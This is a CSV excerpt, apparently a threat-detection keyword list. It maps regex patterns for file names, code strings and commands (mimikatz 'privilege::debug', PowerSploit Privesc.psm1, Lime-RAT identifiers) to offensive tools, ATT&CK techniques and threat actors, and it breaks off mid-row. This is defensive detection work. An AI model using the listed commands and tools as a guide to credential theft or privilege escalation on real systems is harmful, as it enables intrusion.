"*priv/priv_windows.go*",".{0,1000}priv\/priv_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55406"
"*Private AttackRunning As Boolean = *",".{0,1000}Private\sAttackRunning\sAs\sBoolean\s\=\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","55407"
"*Private HostToAttack As String*",".{0,1000}Private\sHostToAttack\sAs\sString.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","55408"
"*privcheck.cna*",".{0,1000}privcheck\.cna.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55409"
"*privcheck32*",".{0,1000}privcheck32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55410"
"*PrivEditor - Kernel Mode WinDbg extension for token privilege edit*",".{0,1000}PrivEditor\s\-\sKernel\sMode\sWinDbg\sextension\sfor\stoken\sprivilege\sedit.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55411"
"*PrivEditor.dll*",".{0,1000}PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55412"
"*Privesc.psm1*",".{0,1000}Privesc\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55413"
"*Privesc.tests.ps1*",".{0,1000}Privesc\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55414"
"*privesc_checker*",".{0,1000}privesc_checker.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55415"
"*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55416"
"*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55417"
"*privesc_juicy_potato '*",".{0,1000}privesc_juicy_potato\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55418"
"*privesc_juicy_potato.py*",".{0,1000}privesc_juicy_potato\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55419"
"*privesc_powerup '*",".{0,1000}privesc_powerup\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55420"
"*privesc_powerup.py*",".{0,1000}privesc_powerup\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","55421"
"*privesc-check*",".{0,1000}privesc\-check.{0,1000}","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","N/A","10","1505","321","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z","55422"
"*PrivescCheck.ps1*",".{0,1000}PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55423"
"*PrivescCheck_*.*",".{0,1000}PrivescCheck_.{0,1000}\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55424"
"*PrivescCheckAsciiReport*",".{0,1000}PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","55425"
"*PrivEscManager.cs*",".{0,1000}PrivEscManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55426"
"*privexchange.py -d *",".{0,1000}privexchange\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55427"
"*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55428"
"*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 -  T1101 -  T1201 -  T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55429"
"*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55430"
"*PrivExchange-master.zip*",".{0,1000}PrivExchange\-master\.zip.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","55431"
"*PrivFu\PowerOfTcb*",".{0,1000}PrivFu\\PowerOfTcb.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55432"
"*PrivFu-main.zip*",".{0,1000}PrivFu\-main\.zip.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55433"
"*PrivFu-master*",".{0,1000}PrivFu\-master.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55434"
"*PrivFuPipeClient.exe*",".{0,1000}PrivFuPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55435"
"*privilege::backup*",".{0,1000}privilege\:\:backup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55436"
"*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55437"
"*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55438"
"*privilege::driver*",".{0,1000}privilege\:\:driver.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55439"
"*privilege::id*",".{0,1000}privilege\:\:id.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55440"
"*privilege::name*",".{0,1000}privilege\:\:name.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55441"
"*privilege::restore*",".{0,1000}privilege\:\:restore.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55442"
"*privilege::security*",".{0,1000}privilege\:\:security.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - 